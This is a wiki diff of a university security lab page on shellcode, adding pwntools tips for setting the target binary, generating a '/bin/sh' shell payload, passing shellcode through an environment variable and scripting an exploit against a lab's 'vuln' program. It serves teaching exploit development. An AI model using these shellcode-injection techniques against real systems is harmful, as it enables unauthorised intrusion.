Differences
This shows you the differences between two versions of the page.
|
cns:labs:lab-05 [2020/11/09 09:54] mihai.dumitru2201 |
cns:labs:lab-05 [2022/11/07 14:44] (current) mihai.dumitru2201 [Tasks] |
||
|---|---|---|---|
| Line 299: | Line 299: | ||
| ''', arch = 'amd64') | ''', arch = 'amd64') | ||
| </code> | </code> | ||
| + | |||
| + | <note tip>Most of the time you'll be working with as specific vulnerable program. To avoid specifing architecture for the ''asm'' function or to ''shellcraft'' you can define the context at the start of the script which will imply the architecture from the binary header. | ||
| + | |||
| + | <code python> | ||
| + | context.binary = './vuln_program' | ||
| + | | ||
| + | shellcode = asm(''' | ||
| + | mov rdi, 0 | ||
| + | mov rax, 60 | ||
| + | syscall | ||
| + | ''') | ||
| + | print(shellcraft.sh()) | ||
| + | </code> | ||
| + | |||
| + | </note> | ||
| ==== GDB integration ==== | ==== GDB integration ==== | ||
| Line 383: | Line 398: | ||
| All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | ||
| - | |||
| ==== 1. Passing shellcode through the environment ==== | ==== 1. Passing shellcode through the environment ==== | ||
| Line 403: | Line 417: | ||
| Env var addr 0xfffdd1e7 | Env var addr 0xfffdd1e7 | ||
| </code> | </code> | ||
| + | |||
| + | <note tip>You can also use pwntools to pass the env var: | ||
| + | <code python> | ||
| + | from pwn import * | ||
| + | p = process(['./getenv', 'A'], env={'A': shellcode}) | ||
| + | print(p.recvline()) | ||
| + | </code> | ||
| + | |||
| + | This way you can do the whole exploit with a python script: | ||
| + | - run ''getenv'' to leak the address | ||
| + | - parse the output of ''getenv'' | ||
| + | - build the payload and send to ''vuln'' | ||
| + | </note> | ||
| This is the address at which you will return to. | This is the address at which you will return to. | ||
| Line 435: | Line 462: | ||
| * In order to get ''/bin/sh'' onto the stack, your shellcode could look something like this: \\ <code asm> | * In order to get ''/bin/sh'' onto the stack, your shellcode could look something like this: \\ <code asm> | ||
| jmp <offset> ; determine through trial and error | jmp <offset> ; determine through trial and error | ||
| - | '/bin/sh'\0 | + | '/bin/sh\0' |
| ; code continues here | ; code continues here | ||
| </code> \\ This will effectively jump over the ''/bin/sh'' string on the stack, which you can then use for your shellcode. Without this initial **jmp** instruction, the string will be interpreted as instructions! | </code> \\ This will effectively jump over the ''/bin/sh'' string on the stack, which you can then use for your shellcode. Without this initial **jmp** instruction, the string will be interpreted as instructions! | ||
